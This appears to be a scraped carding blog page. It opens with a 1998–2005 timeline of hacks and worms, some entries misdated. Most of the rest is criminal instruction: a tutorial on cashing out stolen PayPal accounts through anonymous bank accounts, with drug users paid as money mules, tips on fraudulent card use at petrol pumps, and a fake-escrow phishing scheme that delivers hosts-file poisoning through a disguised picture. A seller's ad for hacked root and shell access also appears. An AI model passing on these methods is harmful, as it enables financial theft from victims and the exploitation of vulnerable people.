1998.02.17 www.top50mp3.com hacked Prizm
1998.02.18 Thermocresteusa hacked JF Josh Freedaleman
1998.02.18 XHN Industries hacked KaGe of Mising Link
1998.02.19 Intellus in Norway hacked
1998.02.19 Interpraesenz Online Service hacked amish group
1998.02.19 Saatchi & Saatchi hacked (used shockeave) trix and vertes
1998.02.19 maxout hacked JF Josh Freedaleman
1998.02.20 Thomas More College hacked Magica de Bin
1998.02.21 humblebums.com hacked Noid/TechVoodoo
1998.02.21 Jacksonville U hacked
1998.02.22 One Life Crew hacked
1998.02.22 Huntingtimes.com hacked cyberchrist
1998.02.22 allwrestling.com hacked cyberchrist
1998.02.23 Systematic.com hacked Claire Danes
1998.02.24 GeBeKo in Germany hacked
1998.02.24 16 sports, cars, toy stores hacked Kalony
1998.02.24 webglass.com hacked Claire Danes
1998.02.24 duesseldorf.com hacked Claire Danes
1998.02.24 hellas-on-business (Greece) hacked Claire Danes
1998.02.25 MIT Plasma & Fusion Center (PSFC) and DoD computers hacked by Analyzer (Ehud Tenenbaum)
1998.02.26 Solar Sunrise - DoD hacks (7 AF sites, 2 navy sites)
1998.02.27 Napier University, Edinburgh, UK hacked Magica de Bin
1998.02.27 Hypermall (athena.hypermall.com) hacked The Noid / TechVoodoo
1998.02.27 BEBEnterprises (www.localafffairs.com) hacked The Noid / TechVoodoo
1998.03.01 Sprint International Global One hacked Simon
1998.03.02 Persatuan Hackers Indonesia hacked
1998.03.03 NetDex ISP hacked by The Analyzer and The Enforcers (Tennenbaum)
1998.03.03 Izmir College, Turkey hacked Painfall for Ravena
1998.03.03 U of Bordeaux hacked Magica de Bin
1998.03.04 At least 25 universities hacked (exploiting Windows 95 and NT)
1998.03.04 Yuzuncu Yil U hacked
1998.03.05 Cybermall hacked
1998.03.05 Nambla.org hacked 74074
1998.03.06 PBS server hacked Zyklon
1998.03.07 Jerusalem Post hacked
1998.03.08 Brookhaven National Lab hacked Toxic 'n Xnec
1998.03.08 Rainbow Casino hacked seal
1998.03.08 US Army 7th Brigade hacked Noid
1998.03.08 US Army Air Defense Artillery School at Ft Bliss hacked Noid
1998.03.08 US Army executive s/w systems directorate hacked Noid
1998.03.08 Patricia Seybold Group hacked Noid
1998.03.09 Naval Space Command hacked The Noid / TechVoodoo
1998.03.09 Keystone Central School District hacked Zyklon
1998.03.09 Cheesi s/w hacked
1998.03.10 K12 domain hacked
1998.03.10 NASA Ames (zeus.arc.nasa.gov) hacked Magica de Bin
1998.03.10 Learninglink.org hacked
1998.03.15 Stockton Community Wide Web hacked
1998.03.17 University of Minnesota hacked
1998.03.18 Ehud Tenenbaum arrested for hacking (The Analyzer)
1998.03.30 T-Online (German telephone company) hacked
1998.04.09 Stanford reloaded files from corrupt backup tape, destroying faculty files
1998.04.17 NASA computers at JPL broken into and rootkit added (Raymond Torricelli)
1998.04.22 DISN (DISA) hacked; DEM hacked which controls GPS Masters of Download (MoD)
1998.00.00 Presidential Decision Directive 63 signed; protect nation's critical infrastructure
1998.05.00 Max Vision (Max Butler), the Equalizer released backdoor to military computers
1998.05.30 AOL social engineered to grant access into the ACLU web site
1998.06.15 Indian nuclear research center servers hacked MilW0rm
1998.06.23 new Word macro virus - WM/Poly-Poster
1998.06.30 US Coast Guard personnel database wiped out by disgruntled employee Singla, S
1998.07.00 Meganet in CA sees massive attacks against them; tracked back to Russia Academy of Sciences
1998.07.05 300 web sites hacked Milw0rm and Ashtray Luberjacks
1998.07.10 ProHost hacked Milw0rm
1998.07.15 Time Warner Systems hacked LoU
1998.07.17 Back Orfice introduced Cult of Dead Cow (cDc)
1998.08.00 Navy sees more intrusions in Pac Fleet and Pacific Command
1998.08.01 45 Indonesian sites hacked KaotiK Team
1998.08.15 180,000 passwords stolen; 48,000 cracked by Jack the Ripper program
1998.08.23 Paramount web site hacked Zyklon (Seattle - LoU)
1998.08.24 Internet Alaska hacked; attacked by the smurf attack
1998.08.30 Australian government's web site hacked
1998.09.13 NY Times hacked HFG (Hacking for Girlies)
1998.09.17 2,585 US West computers hacked to find prime number Blosser, Aaron
1998.09.19 hackers sabatoge web site of Sweden's main opposition pary
1998.09.20 hackers from 15 locations attacking Navy web sites (SHADOW sees trends at SPAWAR)
1998.09.23 internet auction sites have had their credit cards, info, exposed
1998.10.01 www.slashdot.org hacked
1998.10.01 24,000 domains hacked; hosted by japan.co.jp Legions OfThe Underground
1998.01.01 300 domains hacked Ashtray Lumberjacks
1998.10.07 478 domains hacked Cha0s
1998.10.13 4 men installed chips in gas pumps to cheat consumers
1998.10.13 DoD attacks hacker group with information warfare techniques Electronic Disruption Theater
1998.10.15 hackers invade India army site about Kashmir
1998.10.27 China's Human Rights site Hacked bronc (LoU)
1998.10.28 Rootshell hacked thru ssh-1.2.26
1998.11.00 Cloverdale Two sentenced to 3 years probation
1998.11.06 hacker convicted of hacking into U of Iowa and U of Wisconsin Mitra, Rajib
1999.11.15 Varna Hacking Group cracks home page for te Cartoon Network cable channel
1999.02.01 Canadian team charged in Smurf attack; attacked Sympatico ISP
1999.02.16 id Software website defaced (Doom and Quake) using uploader.exe mEsachicken
1999.02.19 COMDEX Website Defaced E-pROM
1999.02.01 www.conservative.org hacked Diablo
1999.01.13 Censure and Move On site hacked
1999.02.15 15 year old from Vienna hacks into Clemson U
1999.02.23 Dutch site, www.vaart.nl, hacked
1999.03.00 Moonlight Maze Russian Academy of Sciences hacking attacks against DoD
1999.03.03 Monicalewinsky.com site hacked MagicFX
1999.03.15 Navy's Medical Information Mgt Center in Bethesda hacked Russian supporters of Serbia
1999.03.24 NATO web site in Brussels knocked down Serb hackers
1999.03.29 Melissa macro virus affects 100,000 email users; written by David Smith
1999.04.04 Canadian hackers attack 13 major corporate sites Yorkshire Posse
1999.04.15 I. Iffih hacks into ZMOS, Washington State and into NASA and DDLA
1999.04.20 Patuxent River Naval Air Station spammed with "Serbia is here" email Belgrade hacker
1999.04.21 hacker broke into Washington National Airport air traffic control frequency
1999.04.23 hacker breaks into U of Washington web site gh (global hell)
1999.04.26 Chernobyl CIH virus
1999.05.01 Dutch hackers (Dutchthreat) hack Yugoslav web server
1995.05.05 hacker steals Hotmail passwords
1999.05.07 Hackers targeting US sites (DOE, Dept of Interior) in protest of Chinese embassy bombing in Belgrade
1999.05.11 Hack against White House web site (www.whitehouse.com) by global hell
1999.05.26 hack against FBI web site
1999.05.27 hack against US Senate web site
1996.06.01 Interior Department hit by hackers
1999.06.11 hack against US Senate web site again (Varna Hacking Group)
1999.07.07 Back Orifice 2000 released
1999.08.30 ABC news broken in by "The United Loan Gunman"
1999.09.30 Ontario Ministry of Northern Development and Mines hacked by Sarin
1999.09.06 C-Span broken in by "The United Loan Gunman"
1999.09.07 Level Seven Crew hack US Embassy in China
1999.09.07 Scottish Executive Website hacked by Scotland hackers
1999.09.08 KKK site hacked
1999.09.09 International Association for Counterterrorism & Security Professionals hacked by bowlerz
1999.09.09 AOL ICQ passwords stolen with trojan horse disguised as jpeg file
1999.09.13 Drudge Report broken in by "The United Loan Gunman"
1999.09.13 South Africa's official statistics website hacked
1999.09.15 Nasdaq and American Stock Exchange broken in by "The United Loan Gunman"
1999.09.19 NAACP broken in by "The United Loan Gunman"
1999.09.22 Rogers University hacked by bl0w team
1999.09.23 Ranger Power hacked by LevelSeven
2000.01.10 CD Universe hacked by Maxus; 350,000 credit cards stolen; $100K ransom demanded; numbers posted on Web
2000.01.15 Curador steals over 23,000 credit card numbers from 8 small companies
2000.01.17 Library of Congress web site defaced by LmT; users prevented from accessing congressional legislation
2000.02.07 Yahoo, eBay, Amazon, Buy.com, CNN hit with a distributed DoS; done my MafiaBoy
2000.02.09 ZDNet and e*trade hit with a DDoS; done my MafiaBoy of Canada
2000.02.15 Ray Torricelli hacks into JPL computers; stole credit card numbers and passwords
2000.03.12 Crime Boys from Brazil hack Interior Deptl Army ROTC, JPL
2000.03.15 Raphael Gray arrested for stealing crdit card information; used Gates credit details
2000.03.28 hacker puts sniffer program between AMC at Scott AFB and DOT in MA
2000.05.00 GAO auditors gain access to many DoD sensitive sites
2000.05.15 Love Bug virus sent from Philippines; AMA computer college
2000.06.01 Qualcomm in San Diego hacked by U of Wisconsin student
2000.06.04 Internet.com hijacked
2000.06.15 hacker cracks into Redhotant and steals 24,000 credit card numbers in Kent
2000.06.18 AOL cracked with trojan horse program; 500 subscribers had information stolen
2000.06.20 life stages virus
2000.06.21 Nike site hacked by S-11 group
2000.07.07 Powergen in UK cracked; credit card numbers stolen
2000.08.15 Bret McDanel (Secret Squirrel) spams his company's (Tornado) computer in Del Mar, CA; charged with spamming
2000.09.15 Western Union hacked; 15,000 credit cards exposed
2000.09.26 Jason Diekman (Shadow Knight, Dark Lord) arrested; hacked JPL, Stanford, Harvard
2000.10.00 Microsoft hacked by St Petersburg hacker
2000.11.10 FBI lure 2 Russians to Seattle, monitor connections, hack into russian servers; 1st government hack
2000.12.13 55,000 credit card numbers stolen from Creditcards.com; hacker tried to extort the company; numbers exposed on the Web
2000.12.15 Egghead.com hacked; they have 3.7 million customers; banks issued new credit cards
2000.12.24 hackers steal source code for OS/COMET by Exigent (Melbourne, FL) from US Naval Research Lab
2001.01.15 Indianu U School of Music hacked; stolen Social Security numbers, etc
2001.01.18 Mafiaboy pleads guilty to hacker charges in Montreal
2001.01.22 hacks against CA Republican caucus and Alaska Dept of Interior; US, UK, Australia
2001.01.24 misconfigured router cuts off some Microsoft sites
2001.01.26 hackers attack official Vatican radio website
2001.02.01 hacker steals data from the World Economic Forum, including credit cards
2001.02.12 Anna Kournikova virus released by OnTheFly (20 year old Dutchman)
2001.02.23 Ikenna Iffih charged for hacking NASA, DoD
2001.03.01 40 e-commerce sites in 20 states hacked by Russian groups; million credit card numbers stolen
2001.03.15 Updated version of backdoor program SubSeven (ver 2.2) released
2001.04.11 Consumer Product Safety Commision hacked by COBR4S
2001.04.12 Chinese hackers attack US web sites over spy plane issue; hack Navy Acquisition system
2001.05.07 Diablo2 game site hacked
2001.05.04 Gibson Research Corp hacked by 13 year old (wicked)
2001.05.11 Solaris/IIS worm
2001.05.15 hackers attack U of Washington and put file sharing program on its computers
2001.05.17 Fluffy bunny hacks Apache.org and SourceForge linux site
2001.05.24 Indiana U hacked with the rpc.statd buffer
2001.05.25 Whitehouse.gov hacked, causing denial of service (May 4 repeat)
2001.06.13 "security" domain sites hacked
2001.06.13 European Union "Safer Internet" site hacked
2001.06.14 California Independent System Operators power grid hacked
2001.06.15 ex US Senator's wife sent email nastygrams using hotmail; gets caught
2001.06.20 Zixit credit card database accessed
2001.07.19 Code Red/SirCam
2001.07.23 Dmitry Sklyarov arrested at DefCon for creating program to copy Adobe electronic books
2001.07.15 Ecount gift certificate service hacked by Zilterio; demanded $45,000 to protect 350,000 customers
2001.08.21 Washington-based Riggs bank Visa customer database hacked into
2001.09.18 Nimda worm
2001.10.10 Vasily Gorshkov convicted of 20 counts of fraud and computer crimes; he stole credit card numbers; defrauded PayPal
2001.11.15 insecure satellite link not encrypted allowed for spy satellite images
2001.11.19 156 web sites hosted by Vietnam hacked by revengetheplanet
2001.11.20 playboy.com hacked by Ingreslock; credit card numbers grabbed
2001.11.20 25 church web sites hacked by Hacking for Satan
2001.11.24 Qualcomm hacked by someone at U of Wisconsin
2001.11.25 BadTrans worm
2001.11.27 2 former Cisco accountants sentenced to 34 months for breaking into company computers and stealing stock
2001.12.04 Goner worm
2001.12.07 4 Israeli college students arrested for creating Goner
2001.12.10 GAO site hacked by Anti India Crew (Alqaeda Muslim Alliance)
2001.12.19 Zacker (Maldal) worm
2002.02.15 Lamo hacks New York Times
2002.03.10 Georgia Tech hacked; financial records and credit cards exposed
2002.04.15 Klez virus; 800,000 copies
2002.04.22 Deceptive Duo hacks into US Navy web site
2002.04.23 Deceptive Duo hacks into NASA and DOT web site
2002.04.24 Deceptive Duo hacks the FAA
2002.04.29 Deceptive Duo hacks into Colorado airport web site
2002.04.30 Indiana State University accidently posts personal info on 10,000 students on the Web
2002.05.01 holes discovered in Best Buy and Home Depot wireless LANs
2002.05.10 California State Controller computer hacked; 265,000 names exposed
2002.05.24 Kim Schmitz (kimble hacker (YIHAT)) convicted of insider trading of LetsBuyIt
2002.05.28 TheNerds.Net online electronics store hacked by Zilterio; 100,000 customers
2003.01.25 Slammer (Sapphire) worm; fastest worm in history; affected Microsoft SQL servers; 100,000 hosts
2003.06.04 Bugbear worm; tries to steal passwords and credit card information
2003.07.15 JuJu Jiang arrested for putting a keystroke logger on a New York Kinko's computer.
2003.07.30 DCOM/RPC exploit detected
2003.08.07 Acxion hacked, customer information exposed; hacked by Daniel Baas of Ohio
2003.08.11 Blaster worm; uses the dcom rpc exploit
2003.08.18 Sobig.F worm; $50 million in damages; source of program was porn site
2003.08.18 Nachi (Welchia) worm; tries to remove Blaster worm and put on patch
2003.08.30 MiMail email worm
2003.09.05 Dan Diobanu of Romania arrested for Blaster-F worm
2003.09.09 Adrian Lamo surrenders to federal authorities for hacking New York Times
2003.09.18 Swen (Gibe) worm; looks like a Microsoft advisory
2003.09.20 anti-spam sites hacked by spammers
2003.09.24 1,000 car shoppers' credit details exposed in bulk on Dealerskins
2003.09.26 Jeffrey Parson arrested for writing blaster worm variant
2003.09.29 Brett O'Keefe, CEO of ForensicTec Solutions, arrested for hacking into military and government computers
2003.10.01 QHosts Trojan Horse; alters DNS settings
2003.10.09 Van Dinh arrested for cyber stock scam
2003.10.25 Three Michigan men get into Lowe's wireless computer system and steal credit card information
2003.11.05 Brazilian police arrest 18 Internet hackers
2003.12.22 Lech Johansen acquitted of hacking into DVD security codes
2004.01.26 Mydoom (Novarg) virus released
2004.03.15 T-Mobile USA internal systems hacked, including Paris Hilton;s cell phone data
2004.04.15 computers at Patuxent River NAS, White Sands Missile Range, and JPL hacked by Stakkato
2004.04.29 Sasser worm (netsky) released by Sven Jaschan in Germany
2004.05.15 portion of Cisco's IOS code illegally copied and posted on the Internet; done by Swedish teenager
2004.10.15 University of Texas student hacked into the school and stole info on 37,000 students and employees
2004.11.15 University of Georgia school computer hacked, which may have exposed 32,000 student credit card numbers
2004.12.14 Michigan man sentenced to 9 years for hacking into Lowe's hardware stores
2004.12.15 Zafi Merry Christmas worm released
2004.12.31 Daniel Cuthbert releases the Tsunami donation hack
2005.03.04 Harvard, MIT, and Stanford business schools admissions hacked
2005.03.20 California State University at Chico hacked; information on students stolen
2005.06.15 hacker may ave accessed 40 million credit card numbers from CardSystems Solutions, Inc
2005.06.20 University of Southern California online application system hacked
2005.08.25 Chinese hackers may be hacking into US government computers; FBI investigating
2005.09.14 Teenager sentenced 11 months for the T-Mobile and Paris Hilton cell phone hack
2004.09.15 Hacker accessed UC Berkeley research being done for Dept of Social Services; info on 600,000 people exposed
2005.06.02 South Korea MSN hacked and password-stealing software planted on it
2005.09.19 University of Georgia hacked; info on 1,600 employees, incuding Social Security numbers, accessed
2005.10.05 Daniel Cuthbert convicted of breaking the Computer Misuse Act from releasing the Tsunami donation hack
2005.10.12 Microsoft Windows Genuide Advantage antipiracy system cracked

PayPal cashing tutorial

If you have the paypals you are going to use, then all you need is the following.
Get an ANON bank account. Take the information from that account and set up a paypal account in the same name and info as the bank account. Get your paypal account verified. Then transfer the money from the paypals you have into the paypal you created. Then fast as you can transfer the cash from the paypal you created to the bank account you have. Get this cash out of there as fast as humanly possible as paypal does like to do charge backs in a hurry.
Also if you are doing this for more than a couple of hundred bucks and want to get all of the cash out, you have to have the account in a local bank, ATMS will not work they have daily limits that wont allow a person to reap all the money that they have worked so hard for.
Yeah that has been a problem lately. The only and surest way to make sure that you get your cash is to buy an ANON account or get one set up yourself. You can buy latvian bank accounts,with high limits, and to be honest it is safer fro you financially to set it up yourself. All a person would have to do is to keep the id that the account was set up in and call periodically to check on the balance of the account. When a large amount hits, bam the guy pulls it out, thus screwing over the buyer of the account. this is a scam that would be profitable, but not too cool ya know.
So in short set the account up yourself or pay someone to do it for you. Another way to avoid getting screwed over would be to have some crack head open it for you. This was they are not looking for you they would have their face on the cameras. Even have them go in and get the money out. But be in the parking lot waiting while this happens. Give them like 10% of whatever is pulled out. This is not much, but i know personally that most people are happy with this amount of money, and wont complain, especially if they are looking to use their share for dope or whatever. Just dont use the same person all the time, and make sure that they are smart enough to be able to act their part. Also make sure that they have a good novelty in hand, otherwise they are screwed from the get go. When they are done setting up the account, you hold the bank account info, atm card, and ALL forms of id that was used to set it up. This cuts down on the chance of your account opener screwing you over by just taking the money and running.
Also avoid using Wells Fargo or Bank One at all costs. Dont need to say why, but trust me you dont want to try and use them for something like this.
Accounts should be with online access,coz paypal deposits money,and u have to look for two deposit from paypal.
Withdrawal for us ppl is 3-5days,and for u.k ppl 5-7.I don't know how about other countrys.
Best way to send funds with balance and instant transfer,coz this is non-refunable.So You have no worries.
Happy cashing.

using used-embossed cards for instore

Another thing is to get it done via someone known ...
For example, Now what I do is ... goto some rural petrol pump (there are about each 100 each on a 200 km highway here all owned by corrupt politicians)
And then fill petrol woryh 800 Rs (20$) and swap the card for 500$
I repeat this procedure a couple of times ... until the card limit is reached ....
And the petrol pumps are so remote ... and far away ... tht even chargeback companies refrain frm goin there ....
The remaining money I get in cash n I pay somethn to the guy ...
I have been cashing even unembossed cards for long this way ....

ok, so the sticker; there are like 4 different types of those stickers that shops but on their door to inform you that they accept credit cards in this country.
Apart from the Visa, MC, Diners.. etc logo's there is also the name of the company that supplied them with their terminal.
Once i've noticed how each one of them works i can be almost sure what the printout coming out from their terminal will look like from the sticker on the door of the shop.

DNS poisoning

i can make dns poisoning so it doesnt matter the name of your site...could be ccpower...or butterandjam.com as long as it's got a dedicated ip.so when the person will type www.escrow.com it will go to your website and in link will appear www.escrow.com.

Good site bro ...
But as far as my experience goes in this world to get online clients either you nee to have a very advanced design or if u have a stupid design u should have a very well established name.
At the moment I'd ask you to Re design your site using any TM template .. or if you want I can do it for a fee.
Secondly, Card adword vouchers ... And advertise on google ...
Thirdly, Buy a good virgin mailing list and spam using a dedicated server.
Donot go in for heavy design of the mails juss normal stuff with written articles.
And remember DONOT SPAM YOUR SITE directly ...
Instead ... buy a domain like bestescrow.com or something .... or ifoundit.com
then write a well designed one page salesletter (again i can do it for a fee)
and then spam the link to this page
Buy a skype number foir UK/US using skypeIN and forward it to your cell.
There you are all set ....
Now let everyone fuck wioth you Provide the best solutions don;t make them too good to be true ... but the trick is ...
Tell the people what they wanna hear
and you should have a couple thousand clients in no time ....
Hope it helps...
Anarkist

guys it is just s simple program that will add in C:\WINDOWS\system32\drivers\etc\hosts a new line www.fakeescrow.com escrow-ip
the problem is how to infect them
anyhow, i think is better to tell them that you will send first the item through dhl or fedex, etc and after they`l reiceve the ship track number they will send you the money, make the dhl scan page and send them from service@dhl.com subject: Ship Tracking number for transaction #X
... your esrow site will not stay up for long time

simple?woudnt say that....let me tell you how exactly this works.
as everybody know every auction website have a special link dedicated to scams were they present safe way of payment.
as escrow form of payment they insist on www.escrow.com and not other dodgy website.many ppl checked at least once the orginal website to see how exactly and escrow looks so...it is very important that your escrow will looks exactly as the original one and have the same link.
how you do that?buy a dedicated ip host , make a clone of the orignal escrow but on the main page replace the payment forms with WU or MG.delete the other safe steps explained there and there you go...you got an original escrow.
the link doesnt matter ... could be www.bunnysandrabbits.com or www.toysforgirls.com as after dns poisoning it will appear www.escrow.com in the link.
how am i doing that? well ... either as a seller you send them pictures of your product,either as an admin of escrow send them an invoice.
so they will double click on the picture ... they will see what they asked and cannot be suspicios at all
so there isnt a program that change the host...it's a mix of 2 applcations.if you ask them to download a stupid file...not so many will do it but if they asked for a picture and you send them,i'm 100% sure that they will see'it.
once seen their host is fuckedup so any time they will try log on to escrow.com they will go at your website and the link will be the same www.escrow.com
you can do many tricks like that....you can try with 3bay aswell...or running a spam...any ideeas comes into your mind.

Thursday, April 20, 2006

roots and shells seller!

$30 for root WITH php and smtp
$20 for root WITHOUT php and smtp
$8 for shell (sometimes without php)

YM: blindroot@yahoo.com
MSN: blindroot@yahoo.com
ICQ: 254477048

Mente Perigosa...

Mark Perkel é um autoproclamado génio, que partilha com o mundo as suas ideias. Não é mais um cromo a anunciar o fim do mund ou a vinda de Cristo, mas sim alguém inteligente e informado, cujos artigos (mais de 50.000!), são bastante lúcidos e esclarecidos. Politíca, religião, ciência e filosofia são alguns dos temas que escolhe. Até dá conselhos sobre como recorrer aos serviços de prostitutas. Página com excelentes artigos.

http://www.perkel.com/

Esconde o meu traseiro.

Para ter mais privacidade quando navega na Internet tem uma nova ferramenta online que permite, de forma simples e gratuita, esconder o seu ip e outros dados que podem ser extraídos quando acede a um site. Sugestivo...

http://www.hidemyass.com/